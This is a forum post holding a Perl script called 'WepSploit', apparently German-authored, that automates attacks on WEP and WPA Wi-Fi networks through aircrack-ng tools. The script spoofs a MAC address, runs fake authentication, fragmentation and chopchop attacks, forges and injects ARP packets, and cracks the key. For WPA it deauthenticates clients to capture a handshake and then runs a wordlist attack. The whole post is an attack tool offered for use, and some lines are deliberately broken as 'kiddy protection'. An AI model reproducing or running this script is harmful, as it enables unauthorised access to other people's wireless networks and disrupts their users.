[+]Topic: Code [+]Von: Neo2k8 [+]Return: Code
#!usr/bin/perl # WepSploit <= 2.0 # Discovered by: Neo2k8 # Visit: [url]www.DarK-CodeZ.org[/url] ######################################################## # # ________________________________________________ #|I AM NOT ALLOWED TO use WepSploit 2.0 ^^^^^^^^\ | #|I AM NOT ALLOWED TO use WepSploit 2.0 | | | #|I AM NOT ALLOWED TO use WepSploit 2.0 |_ __ | | #|I AM NOT ALLOWED TO use WepSploit 2.0 (.(. ) | | #|I AM NOT ALLOWED TO use WepSpl_ (_ ) | #| \\ /___/' / | #| _\\_ \ | | #| (( ) /====| | #| \ <.__._- \ | #|______________________________ <//___. || # ######################################################## # # Only for Linux with Aircrack-ng # # Tested on Backtrack 2 Final , Backtrack 3 Beta # # Changelog: # ---------- # # - Bug fixxed # - added Wpa support # - added Kiddy Protection ( A little mistake ;) (5) , not more ) # ######################################################## @usage = ("\n ________ _______ __ __ __ | | | |.-----.-----.| __|.-----.| |.-----.|__| |_ | | | || -__| _ ||__ || _ || || _ || | _| |________||_____| __||_______|| __||__||_____||__|____| |__| |__| coded by Neo2k8 Usage Wep: perl WepSploit.pl -wep ================================================================= Usage Wpa/Wpa2: perl WepSploit.pl -wpa \n\n"); if (@ARGV < X) { system("clear"); print @usage; exit; } $typ = $ARGV[0]; $channel = $ARGV[1]; $apmac= $ARGV[2]; $ssid= $ARGV[3]; $interface = $ARGV[4]; if($typ eq "-wep" or $typ eq "-wpa"){ &loop; } else { system("clear"); print @usage; exit; } sub loop { system("clear"); print "\n\n","Bitte waehlen Sie","\n"; print "--------------------------","\n"; print "[1] Eigene ClientMAC benutzen","\n"; print "[2] Random ClientMAC benutzen","\n"; chomp($eingabe=); Case:{ $eingabe==1 && do { system("clear"); print "\n","Bitte geben Sie die ClientMac ein","\n"; print "die benutzt werden soll","\n"; chomp($clientmac=); &start; last Case; }; $eingabe==2 && do { system("clear"); print "\n","Benutze Random ClientMAC","\n"; &macchanger; last Case; }; do { print "\n","Falsche eingabe","\n"; &loop; }; } } sub macchanger { $a = int(rand(90) +10); $b = int(rand(90) +10); $c = int(rand(90) +10); $d = int(rand(90) +10); $e = int(rand(90) +10); $f = int(rand(90) +10); $clientmac = "$a:$b:$c:$d:$e:$f"; &start; } sub start { print "Faked MAC is : $clientmac","\n\n\n"; system("ifconfig $interface down"); system("macchanger -m $clientmac $interface"); system("ifconfig $interface up"); sleep 3; system("airmon-ng stop $interface"); sleep 1; system("airmon-ng start $interface $channel"); sleep 3; if($typ eq "-wep"){ &wep; } elsif($typ eq "-wpa"){ &wpa; } } sub wep { system("clear"); print "\n\n","Bitte waehlen Sie","\n"; print "--------------------------","\n"; print "[1] Normale Authentication","\n"; print "[2] Andere Authentication fuer Picky Access Points","\n"; chomp($eingabe=); Case:{ $eingabe==1 && do { system("clear"); print "\n","+++++++++++++++++++++++++++++++","\n"; print "++++ Normal Authentication ++++","\n"; print "+++++++++++++++++++++++++++++++","\n"; &normal; last Case; }; $eingabe==2 && do { system("clear"); print "\n","++++++++++++++++++++++++++++++","\n"; print "++++ Picky Authentication ++++","\n"; print "++++++++++++++++++++++++++++++","\n"; &picky; last Case; }; do { print "\n","Falsche eingabe","\n"; &loop2; }; } } sub normal { system("aireplay-ng -1 0 -e $ssid -a $apmac -h $clientmac $interface"); sleep 4; &loop3; } sub picky { if (defined($pid = fork)) { if ($pid) { &loop3; } else { &execut; } } else { die "Prozess klonen fehlgeschlagen\n"; } } sub execut { system("konsole --e aireplay-ng -1 6000 -o 1 -q 10 -e $ssid -a $apmac -h $clientmac $interface"); } sub loop3 { system("clear"); print "\n\n","Bitte waehlen Sie","\n"; print "--------------------------","\n"; print "[1] Fragmentation Attack","\n"; print "[2] Chopchop Attack","\n"; chomp($attack=); Case:{ $attack==1 && do { system("clear"); print "\n","++++++++++++++++++++++++++++++","\n"; print "++++ Fragmentation Attack ++++","\n"; print "++++++++++++++++++++++++++++++","\n"; &frag; last Case; }; $attack==2 && do { system("clear"); print "\n","++++++++++++++++++++++++++++++","\n"; print "++++ Chopchop Attack ++++","\n"; print "++++++++++++++++++++++++++++++","\n"; &chop; last Case; }; do { print "\n","Falsche eingabe","\n"; &loop2; }; } } sub frag { system("aireplay-ng -5 -b $apmac -h $clientmac $interface"); sleep 3; &loop4; } sub chop { system("aireplay-ng -4 -b $apmac -h $clientmac $interface"); sleep 3; &loop4; } sub loop4 { system("packetforge-ng -0 -a $apmac -h $clientmac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request"); sleep 3; &loop5; } sub loop5 { if (defined($pid = fork)) { if ($pid) { &loop6; } else { &dump; } } else { die "Prozess klonen fehlgeschlagen\n"; } } sub dump { system("konsole --e airodump-ng -c $channel --bssid $apmac -w capture $interface"); } sub loop6 { if (defined($pid = fork)) { if ($pid) { &loop7; } else { &inject; } } else { die "Prozess klonen fehlgeschlagen\n"; } } sub inject { system("konsole --e aireplay-ng -2 -r arp-request $interface"); } sub loop7 { sleep 20; system("aircrack-ng -z -b $apmac capture*.cap"); } sub wpa { if (defined($pid = fork)) { if ($pid) { &get_client; } else { &watch_client; } } else { die "Prozess klonen fehlgeschlagen\n"; } } sub get_client { system("konsole --e airodump-ng -c $channel --bssid $apmac -w psk $interface"); } sub watch_client { system("clear"); print "Client available ? [y/n]\n"; chomp($input = ); if($input eq "y") { print "Please Enter Clientmac of available Client. \n"; chomp($client = ); sleep(3); system("aireplay-ng -0 1 -a $apmac -c $client $interface"); sleep(4); &watch_handshake; } else { &watch_client; } } #sub watch end sub watch_handshake { system("clear"); print "Handshake available ? [y/n]\n"; chomp($input = ); if($input eq "y") { system("clear"); print "Path to Wordlist.\n"; chomp($list = ); system("aircrack-ng -w $list -b $apmac psk*.cap"); sleep(2); } else { sleep(1); system("aireplay-ng -0 1 -a $apmac -c $client $interface"); &watch_handshake; } } # written by Neo2k8 # 00:04:0E:6E:C4:64